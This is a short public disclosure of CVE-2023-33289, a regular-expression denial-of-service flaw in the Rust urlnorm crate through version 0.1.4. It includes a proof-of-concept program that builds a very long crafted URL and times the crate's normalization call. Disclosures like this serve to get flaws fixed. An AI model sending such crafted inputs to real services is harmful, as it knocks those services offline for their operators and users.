CVE-2023-33289: Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust

Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust

Regex Denial of service in urlnorm package on https://crates.io/crates/urlnorm

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.

The regex defined on line 37. in https://github.com/progscrape/urlnorm/blob/main/src/lib.rs used for trimming .html and other

extensions when normalizing the url is vulnerable to a Regex Denial of Service when malicious input is provided.

Poc Code:

‘’’

use url::Url;

use urlnorm::UrlNormalizer;

use std::{time::{Duration, Instant}};

fn main() {

println!("[ + ] Testing urlnorm package");

let x = std::iter::repeat(“A5.html”).take(50000).collect::<String>().to_owned();

let norm = UrlNormalizer::default();

let mut url_input ="https://goooooooogle.com/hello/index.html/".to_owned();

url_input.push_str(x.as_str());

url_input.push_str(“\x00”);

let url = Url::parse(&url_input).unwrap();

println!("{:?}",url);

let start = Instant::now();

let normalized = norm.compute_normalization_string(&url);

//let normalized = norm.normalize_host(&url).unwrap();

println!("[ + ] Url -> {:?}", normalized);

let end = start.elapsed();

println!("[ + ] Time elapsed {:?}", end);

}

‘’’